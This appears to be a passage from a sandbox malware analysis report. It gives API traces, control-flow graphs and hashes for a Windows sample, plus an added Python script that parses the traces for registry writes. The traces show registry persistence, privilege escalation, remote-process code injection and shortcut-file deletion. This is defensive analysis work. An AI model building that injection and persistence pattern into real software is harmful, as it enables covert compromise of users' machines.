• RegOpenKeyExA.KERNEL32(80000001,014321D4,00000000,000F003F,00000000), ref: 01443D0B
• RegSetValueExA.KERNEL32(00000000,014321C0,00000000,00000004,00000000,00000004), ref: 01443D3A
• RegCloseKey.KERNEL32(00000000), ref: 01443D47
• RegOpenKeyExA.KERNEL32(80000002,014322EC,00000000,000F003F,00000000), ref: 01443D67
• RegSetValueExA.KERNEL32(00000000,01432328,00000000,00000004,00000000,00000004), ref: 01443D96
• RegCloseKey.ADVAPI32(00000000), ref: 01443DA3
• lstrcpy.KERNEL32(00000000,01432384), ref: 01443DB7
• lstrcat.KERNEL32(00000000,0143242C), ref: 01443DCA
• RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,000F003F,00000000), ref: 01443DEA
• GetModuleFileNameA.KERNEL32(00000000,00000000,00000200), ref: 01443E02
• wsprintfA.USER32 ref: 01443E1C
• lstrlen.KERNEL32(?), ref: 01443E2C
• RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 01443E4C
• RegCloseKey.ADVAPI32(?), ref: 01443E59
• RegOpenKeyExA.KERNEL32(80000002,01432384,00000000,000F003F,00000000), ref: 01443E79
• RegSetValueExA.KERNELBASE(00000000,0143274C,00000000,00000004,00000000,00000004), ref: 01443EAC
• RegSetValueExA.KERNELBASE(00000000,0143275C,00000000,00000004,00000000,00000004), ref: 01443ED7
• RegSetValueExA.KERNEL32(00000000,01432774,00000000,00000004,00000001,00000004), ref: 01443F02
• RegCloseKey.KERNEL32(00000000), ref: 01443F0F
  • Part of subcall function 01440B9A: lstrcpy.KERNEL32(?,?), ref: 01440BC8
  • Part of subcall function 01440B9A: GetTickCount.KERNEL32 ref: 01440BCE
  • Part of subcall function 01440B9A: lstrlen.KERNEL32(?,01433D08,00000000), ref: 01440BE1
  • Part of subcall function 01440B9A: wsprintfA.USER32 ref: 01440BEF
  • Part of subcall function 01440B9A: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 01440C0E
  • Part of subcall function 01440B9A: CloseHandle.KERNEL32(?), ref: 01440C2A
  • Part of subcall function 01440B9A: DeleteFileA.KERNEL32(?), ref: 01440C37
• GetWindowsDirectoryA.KERNEL32(C:\Windows\,00000104), ref: 01443F1F
• lstrlen.KERNEL32(C:\Windows\), ref: 01443F2A
• lstrcat.KERNEL32(C:\Windows\,01433E20), ref: 01443F46
• GetComputerNameA.KERNEL32(00000000,00000080), ref: 01443F64
• lstrlen.KERNEL32(00000000), ref: 01443F71
• lstrlen.KERNEL32(00000000), ref: 01443F8F
• lstrcpy.KERNEL32(Software\Hwdq,Software\), ref: 01443FD3
• GetUserNameA.ADVAPI32(00000000,00000080), ref: 01443FF1
• lstrlen.KERNEL32(00000000), ref: 01443FFE
• lstrcpy.KERNEL32(00000000,01432364), ref: 01444017
• lstrlen.KERNEL32(?), ref: 01444055
• lstrlen.KERNEL32(Software\Hwdq), ref: 014440D0
• GetTempPathA.KERNEL32(000000E4,C:\Windows\ueqe.log), ref: 014440FC
• lstrlen.KERNEL32(C:\Windows\ueqe.log), ref: 01444107
• lstrcat.KERNEL32(C:\Windows\ueqe.log,01433E30), ref: 01444123
• lstrcpy.KERNEL32(C:\Windows\ueqe.log,01432100), ref: 01444145
• lstrcpy.KERNEL32(C:\Windows\ueqe.log,C:\Windows\), ref: 01444157
• lstrlen.KERNEL32(?), ref: 0144417F
• lstrlen.KERNEL32(C:\Windows\ueqe.log), ref: 014441F4
• lstrcat.KERNEL32(C:\Windows\ueqe.log,0143266C), ref: 01444211
• CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,01432370), ref: 0144422A
• lstrlen.KERNEL32(67320627207), ref: 01444357
• GetTickCount.KERNEL32 ref: 014443AA
• wsprintfA.USER32 ref: 014443BD
• lstrlen.KERNEL32(?,01433E34,?), ref: 01444474
• wsprintfA.USER32 ref: 01444482
• lstrcat.KERNEL32(?,0143226C), ref: 014444B8
• GetSystemDirectoryA.KERNEL32(C:\Windows\system32\drivers\qijmfn.sys,00000080), ref: 014444C8
• lstrlen.KERNEL32(C:\Windows\system32\drivers\qijmfn.sys), ref: 014444D3
• lstrcat.KERNEL32(C:\Windows\system32\drivers\qijmfn.sys,01433E38), ref: 014444EF
• lstrcat.KERNEL32(C:\Windows\system32\drivers\qijmfn.sys,01432288), ref: 01444501
• lstrcat.KERNEL32(C:\Windows\system32\drivers\qijmfn.sys,?), ref: 01444513
• GlobalAlloc.KERNEL32(00000040,00020000), ref: 01444520
• GlobalAlloc.KERNEL32(00000040,00020000), ref: 01444532
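The APIs list above is a flat trace, and the registry activity it records is easier to reason about once each RegSetValueExA is tied back to the RegOpenKeyExA that opened its key. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses lines in the `• Api.Module(args), ref: addr` shape, decodes the predefined hive handle (80000001 is HKEY_CURRENT_USER, 80000002 is HKEY_LOCAL_MACHINE) and the value type (00000004 is REG_DWORD, 00000001 is REG_SZ), and flags a REG_SZ write made while a key is open and after GetModuleFileNameA has run, which is the shape of a persistence write of the sample's own path. The embedded input is a subset of the lines from the listing above, in their original order; 8-hex-digit subkey arguments are pointers into the dump that the report does not resolve, so they are reported as pointers rather than as key names, and `?` arguments are values the analyzer could not recover.

```python
"""Parse the 'APIs' lines of a Joe Sandbox function listing and pull out the
registry writes. Added example, not part of the report: it understands only the
bullet-style `Api.Module(args), ref: addr` line shape used in the listing above."""
import re
from dataclasses import dataclass
from typing import Optional

# Predefined hive handles, passed as the first RegOpenKeyExA argument.
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
# RegSetValueExA dwType, the fourth argument.
REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD", 7: "REG_MULTI_SZ"}

LINE_RE = re.compile(
    r"•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: int
    subcall: Optional[str] = None  # set for "Part of subcall function X" context lines

@dataclass
class RegWrite:
    hive: str
    subkey: str       # pointer to a string in the dump (unresolved by the report) or "runtime-built"
    value_type: str
    data: object      # raw fifth argument: DWORD value, pointer, or "?" when the analyzer lost it
    ref: int
    self_path: bool   # REG_SZ written while the key was open and after GetModuleFileNameA ran

def parse_arg(tok: str):
    """Eight hex digits are a raw argument value; anything else is a resolved string or '?'."""
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok

def parse_trace(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
            calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"]))
    return calls

def registry_writes(calls: list) -> list:
    """Tie each RegSetValueExA to the RegOpenKeyExA that opened the key it writes."""
    writes, key, saw_module_path = [], None, False
    for c in calls:
        if c.subcall:  # callee context lines are not this function's own calls
            continue
        if c.api == "RegOpenKeyExA" and len(c.args) >= 2:
            hive, sub = c.args[0], c.args[1]
            hive_name = HIVES.get(hive, f"0x{hive:08X}") if isinstance(hive, int) else str(hive)
            sub_name = f"0x{sub:08X}" if isinstance(sub, int) and sub else "runtime-built"
            key, saw_module_path = (hive_name, sub_name), False
        elif c.api == "GetModuleFileNameA":
            saw_module_path = True
        elif c.api == "RegSetValueExA" and key and len(c.args) >= 5:
            t = c.args[3]
            type_name = REG_TYPES.get(t, f"type {t}") if isinstance(t, int) else str(t)
            writes.append(RegWrite(key[0], key[1], type_name, c.args[4], c.ref,
                                   saw_module_path and t == 1))
        elif c.api == "RegCloseKey":
            key, saw_module_path = None, False
    return writes

def artifact_paths(calls: list) -> list:
    """Resolved string arguments that look like registry or file paths."""
    return sorted({a for c in calls for a in c.args if isinstance(a, str) and "\\" in a})

# Lines copied from the APIs listing above (a subset, in their original order).
SAMPLE = r"""
  • Part of subcall function 01442EBC: RegOpenKeyExA.KERNEL32(80000001,0143244C,00000000,000F003F,?,?), ref: 01442F03
• RegOpenKeyExA.KERNEL32(80000001,014321D4,00000000,000F003F,00000000), ref: 01443D0B
• RegSetValueExA.KERNEL32(00000000,014321C0,00000000,00000004,00000000,00000004), ref: 01443D3A
• RegCloseKey.KERNEL32(00000000), ref: 01443D47
• RegOpenKeyExA.KERNEL32(80000002,014322EC,00000000,000F003F,00000000), ref: 01443D67
• RegSetValueExA.KERNEL32(00000000,01432328,00000000,00000004,00000000,00000004), ref: 01443D96
• RegCloseKey.ADVAPI32(00000000), ref: 01443DA3
• RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,000F003F,00000000), ref: 01443DEA
• GetModuleFileNameA.KERNEL32(00000000,00000000,00000200), ref: 01443E02
• RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 01443E4C
• RegCloseKey.ADVAPI32(?), ref: 01443E59
• RegOpenKeyExA.KERNEL32(80000002,01432384,00000000,000F003F,00000000), ref: 01443E79
• RegSetValueExA.KERNELBASE(00000000,0143274C,00000000,00000004,00000000,00000004), ref: 01443EAC
• RegSetValueExA.KERNELBASE(00000000,0143275C,00000000,00000004,00000000,00000004), ref: 01443ED7
• RegSetValueExA.KERNEL32(00000000,01432774,00000000,00000004,00000001,00000004), ref: 01443F02
• RegCloseKey.KERNEL32(00000000), ref: 01443F0F
• lstrcpy.KERNEL32(Software\Hwdq,Software\), ref: 01443FD3
• GetTempPathA.KERNEL32(000000E4,C:\Windows\ueqe.log), ref: 014440FC
• GetSystemDirectoryA.KERNEL32(C:\Windows\system32\drivers\qijmfn.sys,00000080), ref: 014444C8
"""

if __name__ == "__main__":
    trace = parse_trace(SAMPLE)
    for w in registry_writes(trace):
        note = "  <- string value written right after GetModuleFileNameA" if w.self_path else ""
        print(f"{w.ref:08X} {w.hive}\\{w.subkey} {w.value_type} data={w.data!r}{note}")
    print("paths seen:", artifact_paths(trace))
```

Run against the listing, this yields six writes: one REG_DWORD under HKEY_CURRENT_USER, four REG_DWORDs under HKEY_LOCAL_MACHINE (the last of them setting 1), and one REG_SZ under a HKEY_LOCAL_MACHINE key whose name is only built at runtime (the subkey argument is NULL in the trace) immediately after GetModuleFileNameA, which is the write to inspect first when triaging a host. The path strings it surfaces (Software\Hwdq, C:\Windows\ueqe.log, C:\Windows\system32\drivers\qijmfn.sys) come from this run only: the trace shows GetTickCount read just before the wsprintfA that formats the name later appended to the driver path, which suggests these names vary between infections and should be corroborated rather than used as fixed indicators.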
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: lstrlen$lstrcat$AddressProcValuelstrcpy$Close$Open$Filewsprintf$Name$AllocCountCreateDirectoryGlobalLibraryLoadTick$ComputerDeleteHandleMappingModulePathSystemTempUserWindows
                                                                                                                                                                                                                                                                                            • String ID: 67320627207$C:\Windows\system32\drivers\qijmfn.sys$C:\Windows\ueqe.log$Software\$Software\Hwdq$n$userC:\Windows\
                                                                                                                                                                                                                                                                                            • API String ID: 1097455987-260886683
                                                                                                                                                                                                                                                                                            • Opcode ID: 40a24a982668e5d33eb7901b067d0dfd105d36e336266eb4b74596f62768f0dd
                                                                                                                                                                                                                                                                                            • Instruction ID: 37fabfd3861926651c6c69a2412deafeaa1f1af45735529a5d525e8d357dc313
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40a24a982668e5d33eb7901b067d0dfd105d36e336266eb4b74596f62768f0dd
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D842C6B1A006149FEB24DF64DC88BEAB7B5BF4CB05F144199E709A72A4D7705A80CF54
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ExchangeInterlocked
                                                                                                                                                                                                                                                                                            • String ID: .adata$2$CreateFileA$CreateFileW$GetProcAddress$M$$OpenFile$PE$_lopen$d$d$d
                                                                                                                                                                                                                                                                                            • API String ID: 367298776-1942104897
                                                                                                                                                                                                                                                                                            • Opcode ID: 762b92fba7d6d788395157fd7ff3eeddea79a09d9c307bfb32a3a6dc7b6c3dec
                                                                                                                                                                                                                                                                                            • Instruction ID: c37974bc76202418140c99e3d692d15046cb999af877c9eaac30293036d2be43
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 762b92fba7d6d788395157fd7ff3eeddea79a09d9c307bfb32a3a6dc7b6c3dec
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4334BB5D01219DBDB24CF58CC80BE9B7B5BF98304F1841EAE10AAB294D7319E85CF54

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 681 1441ef6-1441ff4 call 1448060 OpenProcess 684 14421a7-14421bf OpenProcessToken 681->684 685 1441ffa-1442003 GetLastError 681->685 686 14421c1-14421c8 684->686 687 14421cd-14421e9 GetTokenInformation 684->687 688 1442009-1442040 GetVersionExA 685->688 689 144219b-14421a2 685->689 690 14424ab-14424b2 686->690 693 14421f7-1442200 GetLastError 687->693 694 14421eb-14421f2 687->694 691 1442042-1442049 688->691 692 144204e-1442072 GetCurrentThread OpenThreadToken 688->692 689->690 697 14424b4-14424c1 CloseHandle 690->697 698 14424cb-14424d2 690->698 691->690 695 1442074-144207f GetLastError 692->695 696 14420b3-1442103 LookupPrivilegeValueA AdjustTokenPrivileges 692->696 699 1442202-1442209 693->699 700 144220e-1442231 GetProcessHeap RtlAllocateHeap 693->700 694->690 701 1442081-1442088 695->701 702 144208d-14420a5 GetCurrentProcess OpenProcessToken 695->702 707 1442105-1442119 CloseHandle 696->707 708 144211e-1442129 GetLastError 696->708 697->698 703 14424d4-14424db CloseHandle 698->703 704 14424e1-14424e8 698->704 699->690 705 1442233-144223a 700->705 706 144223f-1442265 GetTokenInformation 700->706 701->690 702->696 709 14420a7-14420ae 702->709 703->704 710 1442500-1442513 704->710 711 14424ea-14424fa GetProcessHeap HeapFree 704->711 705->690 712 1442267-144226e 706->712 713 1442273-14422b9 LookupAccountSidA 706->713 707->690 714 1442144-144218b OpenProcess AdjustTokenPrivileges CloseHandle 708->714 715 144212b-144213f CloseHandle 708->715 709->690 711->710 712->690 716 14422c7-14422d0 713->716 717 14422bb-14422c2 713->717 718 144218d-1442194 714->718 719 1442199 714->719 715->690 720 1442330-1442337 716->720 721 14422d2-14422e6 lstrcmpiA 716->721 717->690 718->690 
719->684 720->690 722 1442314-1442329 CreateMutexA 721->722 723 14422e8-14422fc lstrcmpiA 721->723 722->690 723->722 724 14422fe-1442312 lstrcmpiA 723->724 724->722 725 144232e-1442364 VirtualAllocEx 724->725 727 1442366-144238a WriteProcessMemory 725->727 728 14423cd-14423f5 VirtualAllocEx 725->728 729 144238c-1442393 727->729 730 1442398-14423b8 CreateRemoteThread 727->730 731 1442492-1442499 728->731 732 14423fb-1442455 call 144772b lstrlen call 144772b WriteProcessMemory 728->732 729->690 733 14423c6 730->733 734 14423ba-14423c1 730->734 731->690 739 1442457-144245e 732->739 740 1442460-1442480 CreateRemoteThread 732->740 733->728 734->690 739->690 741 1442482-1442489 740->741 742 144248b 740->742 741->690 742->731
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,0000000A), ref: 01441FE1
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 01441FFA
                                                                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(00000094), ref: 01442033
                                                                                                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 01442063
                                                                                                                                                                                                                                                                                            • OpenThreadToken.ADVAPI32(00000000), ref: 0144206A
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 01442074
                                                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 014421B7
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 014424BB
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 014424DB
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 014424F3
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 014424FA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: OpenProcess$CloseErrorHandleHeapLastThreadToken$CurrentFreeVersion
                                                                                                                                                                                                                                                                                            • String ID: P$SeDebugPrivilege$local service$network service$system
                                                                                                                                                                                                                                                                                            • API String ID: 3470919082-3830299594
                                                                                                                                                                                                                                                                                            • Opcode ID: bfd3a023e785a0738a4d61b14aa51be4cd844eb4f10d14b165be5d6bd065cba6
                                                                                                                                                                                                                                                                                            • Instruction ID: cb139d82630a6d0bb8af75535b0b64efec002255214d37ef55915ae310b2393c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bfd3a023e785a0738a4d61b14aa51be4cd844eb4f10d14b165be5d6bd065cba6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DF14EB5A00258EBEB30CFA4DD48FEABB74FB48711F104299F215A62E4D7B45A85CF50

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 743 1441060-14410d2 Sleep 744 14410d4-14410e9 lstrcat 743->744 745 14410ec-14410ff call 1438deb 743->745 744->745 748 1441117-144113b lstrcat FindFirstFileA 745->748 749 1441101-1441112 745->749 751 1441141-1441151 FindNextFileA 748->751 752 144144c-1441457 748->752 750 14414c8-14414d8 749->750 751->752 753 1441157-1441161 751->753 754 1441492-14414af 752->754 755 1441459-1441461 752->755 757 1441165-144116e 753->757 758 1441163 753->758 760 14414b1-14414b5 FindClose 754->760 761 14414bb-14414c6 Sleep 754->761 755->754 759 1441463-1441467 755->759 762 1441175-1441179 757->762 763 1441170 757->763 758->751 759->754 764 1441469-144146d 759->764 760->761 761->750 765 144119f-14411b7 lstrlen 762->765 766 144117b-1441199 Sleep 762->766 763->752 764->754 767 144146f-1441488 call 1440e71 764->767 769 14411c7-1441201 lstrcat lstrlen * 2 765->769 770 14411b9-14411c2 765->770 766->765 767->754 772 1441297-14412a2 769->772 773 1441207-144121c lstrcmpiA 769->773 770->751 774 1441381-1441394 772->774 775 14412a8-14412b0 772->775 776 1441236-144123d 773->776 777 144121e-1441234 lstrcmpiA 773->777 779 144143e-1441447 774->779 780 144139a-14413a4 774->780 775->774 778 14412b6-14412c0 775->778 781 1441248-1441257 776->781 777->772 777->776 782 14412c2-14412d8 call 1438deb 778->782 783 144133d-1441353 call 1438deb 778->783 779->751 780->779 784 14413aa-14413f5 lstrcpy lstrlen lstrcmpiA 780->784 785 1441287-1441294 call 143e329 781->785 786 1441259-1441275 call 1438deb 781->786 782->783 798 14412da-14412f0 call 1438deb 782->798 783->774 802 1441355-1441368 call 1440cf6 783->802 788 1441424-144143b 784->788 789 14413f7-144141c call 1441060 784->789 785->772 800 1441285 786->800 801 
1441277-1441282 call 143a26e 786->801 788->779 799 1441421 789->799 798->783 812 14412f2-1441338 lstrcpy lstrcat 798->812 799->788 800->781 801->800 810 1441374-1441378 802->810 811 144136a-144136e DeleteFileA 802->811 810->774 813 144137a 810->813 811->810 812->783 813->774
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(?,?), ref: 014410BF
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,01433D20), ref: 014410DD
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,01433D24), ref: 01441120
                                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 0144112E
                                                                                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 01441149
• Sleep.KERNEL32(?), ref: 01441199
• lstrlen.KERNEL32(?), ref: 014411A6
• lstrcat.KERNEL32(?,?), ref: 014411DB
• lstrlen.KERNEL32(?), ref: 014411E5
• lstrlen.KERNEL32(?), ref: 014411F8
• lstrcmpiA.KERNEL32(00000000,014326F0), ref: 01441214
• lstrcmpiA.KERNEL32(00000000,014326F8), ref: 0144122C
• lstrcpy.KERNEL32(-014AB270,?), ref: 0144130C
• lstrcat.KERNEL32(-014AB270,.lnk), ref: 0144132A
• DeleteFileA.KERNEL32(?), ref: 0144136E
• lstrcpy.KERNEL32(?,?), ref: 014413B8
• lstrlen.KERNEL32(?), ref: 014413C5
• lstrcmpiA.KERNEL32(?,0143260C), ref: 014413ED
• FindClose.KERNEL32(00000000), ref: 014414B5
• Sleep.KERNEL32(00000400), ref: 014414C0
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: lstrcatlstrlen$FileFindSleeplstrcmpi$lstrcpy$CloseDeleteFirstNext
• String ID: .lnk$.lnk$.lnk$.tmp$C:\Windows\$d
• API String ID: 3707883041-2096895072
• Opcode ID: a1b29539057227f5de0bbe3e07d7ed8a21855d7803c90f5c3b113e417ae6153f
• Instruction ID: 1585af130b0a9b2d22756f976f21d71737ba2adc69273aa09211dcf7d3b3e087
• Opcode Fuzzy Hash: a1b29539057227f5de0bbe3e07d7ed8a21855d7803c90f5c3b113e417ae6153f
• Instruction Fuzzy Hash: 50D1CDB5A0020A9BEB14CF68D884BAF7BB5FF48B01F148119F915EB355C734E851CB64
Control-flow Graph
APIs
  • Part of subcall function 014344CB: InterlockedExchange.KERNEL32(014490C0,?), ref: 014344E9
• Sleep.KERNEL32 ref: 0143A374
• GetTempPathA.KERNEL32(00000100,00000000), ref: 0143A386
• lstrlen.KERNEL32(00000000), ref: 0143A393
• lstrcat.KERNEL32(00000000,01433CAC), ref: 0143A3B2
• lstrlen.KERNEL32(00000000), ref: 0143A3CC
• lstrcpy.KERNEL32(00000000,00000000), ref: 0143A3E6
• lstrcat.KERNEL32(00000000,01433CB0), ref: 0143A3F8
• FindFirstFileA.KERNEL32(00000000,00000000), ref: 0143A422
• FindNextFileA.KERNELBASE(000000FF,00000000), ref: 0143A449
• lstrcat.KERNEL32(00000000,?), ref: 0143A473
• lstrlen.KERNEL32(00000000), ref: 0143A480
• lstrlen.KERNEL32(?), ref: 0143A493
• lstrcmpiA.KERNEL32(00000000,014326F0), ref: 0143A4AF
• lstrcmpiA.KERNEL32(00000000,_Rar), ref: 0143A4F3
• Sleep.KERNEL32(00000100), ref: 0143A511
• FindClose.KERNEL32(00000000), ref: 0143A52C
• Sleep.KERNEL32(000927C0), ref: 0143A537
• RtlExitUserThread.NTDLL(00000000), ref: 0143A544
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: lstrlen$FindSleeplstrcat$Filelstrcmpi$CloseExchangeExitFirstInterlockedNextPathTempThreadUserlstrcpy
• String ID: _Rar
• API String ID: 932915221-536834240
• Opcode ID: 9dfc5e84df52c0c5cdf5a5dd6775ef24f90189113242e5704b7c8d4bb9ae2eea
• Instruction ID: c166476b3c5647f304c060af70e61859ebd2e9bd1d8dd9107eabf0c66bfdddd0
• Opcode Fuzzy Hash: 9dfc5e84df52c0c5cdf5a5dd6775ef24f90189113242e5704b7c8d4bb9ae2eea
• Instruction Fuzzy Hash: 6A51B3759002189BDB20CB74DC48BEEBB79AB88B05F1045E9E60EE61A4DB749BC4CF50
APIs
• htons.WS2_32(00000EDC), ref: 01437AE9
• socket.WS2_32(00000002,00000002,00000000), ref: 01437B06
• setsockopt.WS2_32(?,0000FFFF,00001002,00100000,00000004), ref: 01437B44
• bind.WS2_32(?,00000002,00000010), ref: 01437B5A
• closesocket.WS2_32(?), ref: 01437C31
• RtlExitUserThread.NTDLL(00000000), ref: 01437C39
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: ExitThreadUserbindclosesockethtonssetsockoptsocket
• String ID:
• API String ID: 3895830221-0
• Opcode ID: 16396cdac5197151bab67bf1d040fa64f4cd1ff627af22c7b071e67665070172
• Instruction ID: ebfc5125e9764fcc8cf90488feda61879e6d8e0568dd90a9b9a13de3c36af8ca
• Opcode Fuzzy Hash: 16396cdac5197151bab67bf1d040fa64f4cd1ff627af22c7b071e67665070172
• Instruction Fuzzy Hash: 9D512CB0E403989BEB348F64CC49BD9B6B4BB4C741F0041D9E399AA294D7F45AC48F58
